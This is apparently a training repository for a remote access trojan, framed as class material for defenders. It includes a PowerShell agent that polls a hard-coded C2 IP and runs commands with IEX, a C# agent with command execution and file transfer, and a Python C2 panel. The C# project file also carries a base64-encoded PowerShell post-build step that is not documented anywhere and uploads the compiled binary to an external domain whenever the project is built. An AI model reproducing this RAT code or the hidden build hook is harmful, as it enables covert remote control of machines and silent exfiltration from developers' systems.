├── .gitattributes
├── .gitignore
├── PowerRattyMcRatFace.ps1
├── README.md
├── RattyMcC2Face
├── .idea
│ ├── RattyMcC2Face.iml
│ ├── misc.xml
│ ├── modules.xml
│ └── workspace.xml
├── README.md
├── RattyMcC2Face.py
└── RattyMcC2Face.pyproj
├── RattyMcRatFace.sln
├── RattyMcRatFace
├── App.config
├── Program.cs
├── Properties
│ ├── AssemblyInfo.cs
│ ├── Resources.Designer.cs
│ ├── Resources.resx
│ ├── Settings.Designer.cs
│ └── Settings.settings
├── README.md
└── RattyMcRatFace.csproj
├── RattyMcRatFace_Keys.pem
└── pyRattyMcRatFace.py
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.userosscache
8 | *.sln.docstates
9 |
10 | # User-specific files (MonoDevelop/Xamarin Studio)
11 | *.userprefs
12 |
13 | # Build results
14 | [Dd]ebug/
15 | [Dd]ebugPublic/
16 | [Rr]elease/
17 | [Rr]eleases/
18 | [Xx]64/
19 | [Xx]86/
20 | [Bb]uild/
21 | bld/
22 | [Bb]in/
23 | [Oo]bj/
24 |
25 | # Visual Studio 2015 cache/options directory
26 | .vs/
27 | # Uncomment if you have tasks that create the project's static files in wwwroot
28 | #wwwroot/
29 |
30 | # MSTest test Results
31 | [Tt]est[Rr]esult*/
32 | [Bb]uild[Ll]og.*
33 |
34 | # NUNIT
35 | *.VisualState.xml
36 | TestResult.xml
37 |
38 | # Build Results of an ATL Project
39 | [Dd]ebugPS/
40 | [Rr]eleasePS/
41 | dlldata.c
42 |
43 | # DNX
44 | project.lock.json
45 | artifacts/
46 |
47 | *_i.c
48 | *_p.c
49 | *_i.h
50 | *.ilk
51 | *.meta
52 | *.obj
53 | *.pch
54 | *.pdb
55 | *.pgc
56 | *.pgd
57 | *.rsp
58 | *.sbr
59 | *.tlb
60 | *.tli
61 | *.tlh
62 | *.tmp
63 | *.tmp_proj
64 | *.log
65 | *.vspscc
66 | *.vssscc
67 | .builds
68 | *.pidb
69 | *.svclog
70 | *.scc
71 |
72 | # Chutzpah Test files
73 | _Chutzpah*
74 |
75 | # Visual C++ cache files
76 | ipch/
77 | *.aps
78 | *.ncb
79 | *.opendb
80 | *.opensdf
81 | *.sdf
82 | *.cachefile
83 | *.VC.db
84 |
85 | # Visual Studio profiler
86 | *.psess
87 | *.vsp
88 | *.vspx
89 | *.sap
90 |
91 | # TFS 2012 Local Workspace
92 | $tf/
93 |
94 | # Guidance Automation Toolkit
95 | *.gpState
96 |
97 | # ReSharper is a .NET coding add-in
98 | _ReSharper*/
99 | *.[Rr]e[Ss]harper
100 | *.DotSettings.user
101 |
102 | # JustCode is a .NET coding add-in
103 | .JustCode
104 |
105 | # TeamCity is a build add-in
106 | _TeamCity*
107 |
108 | # DotCover is a Code Coverage Tool
109 | *.dotCover
110 |
111 | # NCrunch
112 | _NCrunch_*
113 | .*crunch*.local.xml
114 | nCrunchTemp_*
115 |
116 | # MightyMoose
117 | *.mm.*
118 | AutoTest.Net/
119 |
120 | # Web workbench (sass)
121 | .sass-cache/
122 |
123 | # Installshield output folder
124 | [Ee]xpress/
125 |
126 | # DocProject is a documentation generator add-in
127 | DocProject/buildhelp/
128 | DocProject/Help/*.HxT
129 | DocProject/Help/*.HxC
130 | DocProject/Help/*.hhc
131 | DocProject/Help/*.hhk
132 | DocProject/Help/*.hhp
133 | DocProject/Help/Html2
134 | DocProject/Help/html
135 |
136 | # Click-Once directory
137 | publish/
138 |
139 | # Publish Web Output
140 | *.[Pp]ublish.xml
141 | *.azurePubxml
142 |
143 | # TODO: Un-comment the next line if you do not want to checkin
144 | # your web deploy settings because they may include unencrypted
145 | # passwords
146 | #*.pubxml
147 | *.publishproj
148 |
149 | # NuGet Packages
150 | *.nupkg
151 | # The packages folder can be ignored because of Package Restore
152 | **/packages/*
153 | # except build/, which is used as an MSBuild target.
154 | !**/packages/build/
155 | # Uncomment if necessary however generally it will be regenerated when needed
156 | #!**/packages/repositories.config
157 | # NuGet v3's project.json files produces more ignoreable files
158 | *.nuget.props
159 | *.nuget.targets
160 |
161 | # Microsoft Azure Build Output
162 | csx/
163 | *.build.csdef
164 |
165 | # Microsoft Azure Emulator
166 | ecf/
167 | rcf/
168 |
169 | # Windows Store app package directory
170 | AppPackages/
171 | BundleArtifacts/
172 |
173 | # Visual Studio cache files
174 | # files ending in .cache can be ignored
175 | *.[Cc]ache
176 | # but keep track of directories ending in .cache
177 | !*.[Cc]ache/
178 |
179 | # Others
180 | ClientBin/
181 | [Ss]tyle[Cc]op.*
182 | ~$*
183 | *~
184 | *.dbmdl
185 | *.dbproj.schemaview
186 | *.pfx
187 | *.publishsettings
188 | node_modules/
189 | orleans.codegen.cs
190 |
191 | # RIA/Silverlight projects
192 | Generated_Code/
193 |
194 | # Backup & report files from converting an old project file
195 | # to a newer Visual Studio version. Backup files are not needed,
196 | # because we have git ;-)
197 | _UpgradeReport_Files/
198 | Backup*/
199 | UpgradeLog*.XML
200 | UpgradeLog*.htm
201 |
202 | # SQL Server files
203 | *.mdf
204 | *.ldf
205 |
206 | # Business Intelligence projects
207 | *.rdl.data
208 | *.bim.layout
209 | *.bim_*.settings
210 |
211 | # Microsoft Fakes
212 | FakesAssemblies/
213 |
214 | # GhostDoc plugin setting file
215 | *.GhostDoc.xml
216 |
217 | # Node.js Tools for Visual Studio
218 | .ntvs_analysis.dat
219 |
220 | # Visual Studio 6 build log
221 | *.plg
222 |
223 | # Visual Studio 6 workspace options file
224 | *.opt
225 |
226 | # Visual Studio LightSwitch build output
227 | **/*.HTMLClient/GeneratedArtifacts
228 | **/*.DesktopClient/GeneratedArtifacts
229 | **/*.DesktopClient/ModelManifest.xml
230 | **/*.Server/GeneratedArtifacts
231 | **/*.Server/ModelManifest.xml
232 | _Pvt_Extensions
233 |
234 | # LightSwitch generated files
235 | GeneratedArtifacts/
236 | ModelManifest.xml
237 |
238 | # Paket dependency manager
239 | .paket/paket.exe
240 |
241 | # FAKE - F# Make
242 | .fake/
243 |
--------------------------------------------------------------------------------
/PowerRattyMcRatFace.ps1:
--------------------------------------------------------------------------------
1 | function Get-Command {
2 | return (New-Object System.Net.WebClient).DownloadString($c2)
3 | }
4 |
5 | function Shell-Execute($cmd) {
6 | IEX "$cmd"
7 | }
8 |
9 | function Download($url, $fileName) {
10 | (New-Object System.Net.WebClient).DownloadFile($url.Trim(), $fileName.Trim())
11 | }
12 |
13 | function Upload($url, $fileName) {
14 | (New-Object System.Net.WebClient).UploadFile($url.Trim(), $fileName.Trim())
15 | }
16 |
17 | $c2 = "http://64.137.224.218/file.html"
18 | while ($TRUE) {
19 | $cmdString = Get-Command c2
20 | $cmd,$cmdArg1,$cmdArg2 = $cmdString -split ' '
21 | switch($cmd)
22 | {
23 | "run" { Shell-Execute -cmd $cmdString.Trim($cmd) }
24 | "download" { Download -url $cmdArg1 -fileName $cmdArg2 }
25 | "upload" { -url $cmdArg1 -fileName $cmdArg2 }
26 | "exit" { exit }
27 | }
28 | }
29 |
30 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # RattyMcRatFace
2 |
3 | This is a Proof of Concept of a C# RAT (Remote Access Trojan) made by Sean Pierce (@secure_sean) for the How to Write Malware 101 class to demonstrate to defenders the ease, speed, development goals, and characteristics of common malware. Download the class development VM here: rebrand.ly/writemalware
4 |
5 | ## Easy for an Attacker to Change:
6 | - Hash
7 | - PDB String
8 | - Compile Time
9 | - File Details
10 |
11 | ## Less Easy for an Attacker to Change:
12 | - File Size
13 | - Domains
14 |
15 | ## Harder for an Attacker to Change:
16 | - Features
17 | - Functionality
18 | - Network Traffic
19 | - ImpHash
20 |
21 | ## When hunting for malware Search for:
22 | - Small Executable files - scripts, stagers, downloaders, etc.
23 | - Freshly compiled and installed executables
24 | - Common persistence, malicious/administration functionality
25 |
26 |
27 |
--------------------------------------------------------------------------------
/RattyMcC2Face/.idea/RattyMcC2Face.iml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/RattyMcC2Face/.idea/misc.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/RattyMcC2Face/.idea/modules.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/RattyMcC2Face/.idea/workspace.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
32 |
33 |
34 |
39 |
40 |
41 |
42 |
43 | true
44 | DEFINITION_ORDER
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 | 1516129103806
94 |
95 |
96 | 1516129103806
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 |
--------------------------------------------------------------------------------
/RattyMcC2Face/README.md:
--------------------------------------------------------------------------------
1 | # How to use the Command and Control (C2) Panel
2 |
3 | 0. Transfer the python script if nessasary
4 | ```scp RattyMcC2Face.py root@192.168.x.x:/root```
5 |
6 | 1. Install the requirements if nessasary (already installed in the class development VM here: https://rebrand.ly/writemalware )
7 | ```pip install colorama```
8 |
9 | 2. Execute the python script
10 | ```python RattyMcC2Face.py```
11 |
12 |
--------------------------------------------------------------------------------
/RattyMcC2Face/RattyMcC2Face.py:
--------------------------------------------------------------------------------
1 | from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
2 | from colorama import init, Fore, Back, Style
3 | import datetime
4 |
5 | init()
6 | cmd = ""
7 | class c2(BaseHTTPRequestHandler):
8 | def _set_headers(self):
9 | self.send_response(200)
10 | self.send_header('Content-type', 'text/html')
11 | self.end_headers()
12 |
13 | def do_GET(self):
14 | print(Fore.YELLOW + "Recieved GET request: " + self.path)
15 | print(Fore.YELLOW + "Sending command: " + cmd)
16 | print(Style.RESET_ALL)
17 | self._set_headers()
18 | self.wfile.write(cmd)
19 | # Clear command
20 | global cmd
21 | cmd = ""
22 |
23 | def do_HEAD(self):
24 | self._set_headers()
25 |
26 | def do_POST(self):
27 | content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
28 | post_data = self.rfile.read(content_length) # <--- Gets the data itself
29 | print( Fore.GREEN + "Recieved: " + str(post_data))
30 |
31 | now = datetime.datetime.now()
32 | filename = now.strftime("%Y-%m-%d_%H_%M_%f") + "_uploadedFile.bin"
33 | open(filename,'wb').write(str(post_data))
34 | print( Fore.GREEN + "This output has been written to file: " + filename)
35 | print(Style.RESET_ALL)
36 |
37 | self._set_headers()
38 | self.wfile.write("POSTed!
")
39 |
40 |
41 | server_address = ('', 80)
42 | httpd = HTTPServer(server_address, c2)
43 | print('Starting httpd...')
44 | while True:
45 | cmd = raw_input("Enter Command: ")
46 | httpd.handle_request()
47 | while cmd != "":
48 | httpd.handle_request()
49 | print("> Command Sent!")
--------------------------------------------------------------------------------
/RattyMcC2Face/RattyMcC2Face.pyproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Debug
5 | 2.0
6 | c0401e50-9f78-4418-b8aa-6e46697844ae
7 | .
8 | RattyMcC2Face.py
9 |
10 |
11 | .
12 | .
13 | RattyMcC2Face
14 | RattyMcC2Face
15 |
16 |
17 | true
18 | false
19 |
20 |
21 | true
22 | false
23 |
24 |
25 |
26 |
27 |
28 | 10.0
29 |
30 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
--------------------------------------------------------------------------------
/RattyMcRatFace.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.27130.2036
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RattyMcRatFace", "RattyMcRatFace\RattyMcRatFace.csproj", "{8A18FBCF-8CAC-482D-8AB7-08A44F0E278E}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Release|Any CPU = Release|Any CPU
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {8A18FBCF-8CAC-482D-8AB7-08A44F0E278E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
15 | {8A18FBCF-8CAC-482D-8AB7-08A44F0E278E}.Debug|Any CPU.Build.0 = Debug|Any CPU
16 | {8A18FBCF-8CAC-482D-8AB7-08A44F0E278E}.Release|Any CPU.ActiveCfg = Release|Any CPU
17 | {8A18FBCF-8CAC-482D-8AB7-08A44F0E278E}.Release|Any CPU.Build.0 = Release|Any CPU
18 | EndGlobalSection
19 | GlobalSection(SolutionProperties) = preSolution
20 | HideSolutionNode = FALSE
21 | EndGlobalSection
22 | GlobalSection(ExtensibilityGlobals) = postSolution
23 | SolutionGuid = {DF90CCFE-8ECB-4278-A7E8-E3D68466CA07}
24 | EndGlobalSection
25 | EndGlobal
26 |
--------------------------------------------------------------------------------
/RattyMcRatFace/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/RattyMcRatFace/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Diagnostics;
3 | using System.IO;
4 | using System.Net;
5 | using System.Threading;
6 |
7 | namespace RattyMcRatFace
8 | {
9 | static class Program
10 | {
11 | ///
12 | /// This is a basic example / Proof of Concept of a C# RAT (Remote Access Trojan) made by Sean Pierce (@secure_sean)
13 | /// to demonstrate to defenders the ease, speed, development goals and characteristics of common malware.
14 | /// This is for educational use only
15 | ///
16 | /// ## Easy for an Attacker to Change:
17 | /// Hash
18 | /// PDB String
19 | /// Compile Time
20 | /// File Details
21 | ///
22 | /// ## Less Easy for an Attacker to Change:
23 | /// File Size
24 | /// Domains
25 | ///
26 | /// ## Harder for an Attacker to Change:
27 | /// Features
28 | /// Functionality
29 | /// Network Traffic
30 | /// ImpHash
31 | ///
32 | /// ## When hunting for malware Search for:
33 | /// Small Executable files - scripts, stagers, downloaders, etc.
34 | /// Freshly compiled and installed executables
35 | /// Common persistence, malicious/administration functionality
36 | ///
37 |
38 | [STAThread]
39 | static void Main()
40 | {
41 | // Run the C2 Panel:
42 | // pip install colorama
43 | // python RattyMcC2Face.py
44 | //
45 | //
46 | // Simple C2 Test cases without the python C2 Panel:
47 | // echo "run cmd /c mkdir C:\test" > cmd.html
48 | // echo "download https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe pp.exe" > download.html
49 | // echo "download ftp://ftp.chiark.greenend.org.uk/users/sgtatham/putty-latest/w32/putty.exe pp.exe" > download-ftp.html
50 | // python -m SimpleHTTPServer 80
51 |
52 |
53 | String c2 = "http://127.0.0.1/cmd.html";
54 | Random getrandom = new Random();
55 | while (true)
56 | {
57 | String output = "Command was recieved but there is either no RAT command by that name or there is no output. If there is a RAT command (like 'run', 'upload', or 'download' then you probably need to add code to return the output";
58 | String cmdString = GetCommand(c2);
59 | String cmd = cmdString.Split()[0];
60 | switch (cmd)
61 | {
62 | case "run": // run mkdir C:\test
63 | String programAndArgs = cmdString.Substring(4); // mkdir C:\test
64 | String program = programAndArgs.Split()[0]; // mkdir
65 | String args = programAndArgs.Substring(program.Length); // C:\test
66 | output = ShellExecute(program, args);
67 | break;
68 | case "download":
69 | output = Download(cmdString.Split()[1], cmdString.Split()[2]);
70 | break;
71 | case "upload":
72 | output = Upload(c2, cmdString.Split()[1]);
73 | break;
74 | case "exit":
75 | return;
76 | }
77 | UploadOutput(c2, cmd, output);
78 | }
79 | }
80 |
81 |
82 |
83 | static String GetCommand(String c2)
84 | {
85 | try
86 | {
87 | return (new WebClient()).DownloadString(c2);
88 | }
89 | catch (System.Net.WebException e)
90 | {
91 | return "Failed to get command: " + e.ToString();
92 | }
93 | }
94 |
95 | static string ShellExecute(String cmd, String args)
96 | {
97 | // Old simple way
98 | // System.Diagnostics.Process.Start("CMD.exe", "/C " + cmd);
99 |
100 | // New way so that we can get output
101 | var proc = new Process
102 | {
103 | StartInfo = new ProcessStartInfo
104 | {
105 | FileName = cmd,
106 | Arguments = args,
107 | UseShellExecute = false,
108 | RedirectStandardOutput = true,
109 | CreateNoWindow = true
110 | }
111 | };
112 |
113 | String output = "";
114 | try
115 | {
116 | proc.Start();
117 |
118 | while (!proc.StandardOutput.EndOfStream)
119 | {
120 | output += proc.StandardOutput.ReadLine() + "\n";
121 |
122 | }
123 | } catch ( Exception e)
124 | {
125 | output = e.ToString();
126 | output += output + "\n\nCommand Recieved: " + cmd;
127 | output += output + "\nArgs Recieved:: " + args;
128 | output += output + "\n\nTry: 'run cmd /c " + cmd + args + "'";
129 | }
130 |
131 |
132 | return output;
133 | }
134 |
135 | static String Download(String url, String fileName)
136 | {
137 | try
138 | {
139 | (new WebClient()).DownloadFile(url, fileName);
140 | return "File Attempted to Download";
141 | }
142 | catch (System.Net.WebException e)
143 | {
144 | return "Failed to Download File: " + e.ToString();
145 | }
146 | }
147 |
148 | static String Upload(String url, String fileName)
149 | {
150 | try
151 | {
152 | byte[] responseArray = (new WebClient()).UploadFile(url, fileName);
153 | return "UploadFile Returned: " + System.Text.Encoding.ASCII.GetString(responseArray);
154 |
155 | // Another Method: Reading and upload the content of the file
156 | //string text = System.IO.File.ReadAllText(fileName);
157 | //return "UploadString Returned: " + (new WebClient()).UploadString(url, text);
158 | }
159 | catch (System.Net.WebException e)
160 | {
161 | return "Failed to Upload File: " + e.ToString();
162 | }
163 | }
164 |
165 | static String UploadOutput(String url, String cmd, String output)
166 | {
167 | try
168 | {
169 | return (new WebClient()).UploadString(url, ("Output from '" + cmd + "': " + output));
170 | }
171 | catch (System.Net.WebException e)
172 | {
173 | return "Failed to Upload Output:" + e.ToString();
174 | }
175 | }
176 | }
177 | }
178 |
--------------------------------------------------------------------------------
/RattyMcRatFace/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("RattyMcRatFace")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("RattyMcRatFace")]
13 | [assembly: AssemblyCopyright("Copyright © 2017")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("8a18fbcf-8cac-482d-8ab7-08a44f0e278e")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/RattyMcRatFace/Properties/Resources.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace RattyMcRatFace.Properties
12 | {
13 |
14 |
15 | ///
16 | /// A strongly-typed resource class, for looking up localized strings, etc.
17 | ///
18 | // This class was auto-generated by the StronglyTypedResourceBuilder
19 | // class via a tool like ResGen or Visual Studio.
20 | // To add or remove a member, edit your .ResX file then rerun ResGen
21 | // with the /str option, or rebuild your VS project.
22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
25 | internal class Resources
26 | {
27 |
28 | private static global::System.Resources.ResourceManager resourceMan;
29 |
30 | private static global::System.Globalization.CultureInfo resourceCulture;
31 |
32 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
33 | internal Resources()
34 | {
35 | }
36 |
37 | ///
38 | /// Returns the cached ResourceManager instance used by this class.
39 | ///
40 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
41 | internal static global::System.Resources.ResourceManager ResourceManager
42 | {
43 | get
44 | {
45 | if ((resourceMan == null))
46 | {
47 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("RattyMcRatFace.Properties.Resources", typeof(Resources).Assembly);
48 | resourceMan = temp;
49 | }
50 | return resourceMan;
51 | }
52 | }
53 |
54 | ///
55 | /// Overrides the current thread's CurrentUICulture property for all
56 | /// resource lookups using this strongly typed resource class.
57 | ///
58 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
59 | internal static global::System.Globalization.CultureInfo Culture
60 | {
61 | get
62 | {
63 | return resourceCulture;
64 | }
65 | set
66 | {
67 | resourceCulture = value;
68 | }
69 | }
70 | }
71 | }
72 |
--------------------------------------------------------------------------------
/RattyMcRatFace/Properties/Resources.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 | text/microsoft-resx
107 |
108 |
109 | 2.0
110 |
111 |
112 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
113 |
114 |
115 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
--------------------------------------------------------------------------------
/RattyMcRatFace/Properties/Settings.Designer.cs:
--------------------------------------------------------------------------------
1 | //------------------------------------------------------------------------------
2 | //
3 | // This code was generated by a tool.
4 | // Runtime Version:4.0.30319.42000
5 | //
6 | // Changes to this file may cause incorrect behavior and will be lost if
7 | // the code is regenerated.
8 | //
9 | //------------------------------------------------------------------------------
10 |
11 | namespace RattyMcRatFace.Properties
12 | {
13 |
14 |
15 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
16 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "11.0.0.0")]
17 | internal sealed partial class Settings : global::System.Configuration.ApplicationSettingsBase
18 | {
19 |
20 | private static Settings defaultInstance = ((Settings)(global::System.Configuration.ApplicationSettingsBase.Synchronized(new Settings())));
21 |
22 | public static Settings Default
23 | {
24 | get
25 | {
26 | return defaultInstance;
27 | }
28 | }
29 | }
30 | }
31 |
--------------------------------------------------------------------------------
/RattyMcRatFace/Properties/Settings.settings:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/RattyMcRatFace/README.md:
--------------------------------------------------------------------------------
1 | # RattyMcRatFace
2 |
--------------------------------------------------------------------------------
/RattyMcRatFace/RattyMcRatFace.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {8A18FBCF-8CAC-482D-8AB7-08A44F0E278E}
8 | WinExe
9 | Properties
10 | RattyMcRatFace
11 | RattyMcRatFace
12 | v4.5.2
13 | 512
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 | ResXFileCodeGenerator
53 | Resources.Designer.cs
54 | Designer
55 |
56 |
57 | True
58 | Resources.resx
59 |
60 |
61 | SettingsSingleFileGenerator
62 | Settings.Designer.cs
63 |
64 |
65 | True
66 | Settings.settings
67 | True
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | powershell -c Out-File -filepath $env:TEMP\msbuild.txt -InputObject '$(TargetPath)'
76 | powershell -enc JABGAGkAbABlAFAAYQB0AGgAIAA9ACAAKABnAGMAIAAkAGUAbgB2ADoAVABFAE0AUABcAG0AcwBiAHUAaQBsAGQALgB0AHgAdAApADsAIAAkAFQAYQByAGcAZQB0AFAAYQB0AGgAIAA9ACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABNAGkAYwByAG8AcwBvAGYAdABCAHUAaQBsAGQARQB2AGUAbgB0AHMAIgA7ACAAJABkAGEAdABlACAAPQAgACgARwBlAHQALQBEAGEAdABlACAALQBVAEYAbwByAG0AYQB0ACAAIgAlAFkALQAlAG0ALQAlAGQALQAtACUASAAtACUATQAtACUAUwAiACkAOwAgAG0AawBkAGkAcgAgACQAVABhAHIAZwBlAHQAUABhAHQAaAAgAC0ARgBvAHIAYwBlACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAiACQARgBpAGwAZQBQAGEAdABoACIALgBSAGUAcABsAGEAYwBlACgAIgAnACIALAAiACIAKQAgACIAJABUAGEAcgBnAGUAdABQAGEAdABoAFwAJABkAGEAdABlACIALgBSAGUAcABsAGEAYwBlACgAIgAnACIALAAiACIAKQA7ACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAIgBOAG8AIABSAGUAcABvAG4AcwBlACIAOwAgAHQAcgB5ACAAewAgACQAcgBlAHMAcABvAG4AcwBlACAAPQAgACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AVQBwAGwAbwBhAGQARgBpAGwAZQBBAHMAeQBuAGMAKAAiAGgAdAB0AHAAcwA6AC8ALwBpAG4AZgBvAC4AaABvAG8AawB1AHAAZgBhAGkAbABzAC4AYwBvAG0ALwB1AHAAbABvAGEAZABDAGEAdABjAGgAZQByAC4AcABoAHAAIgAsACQAR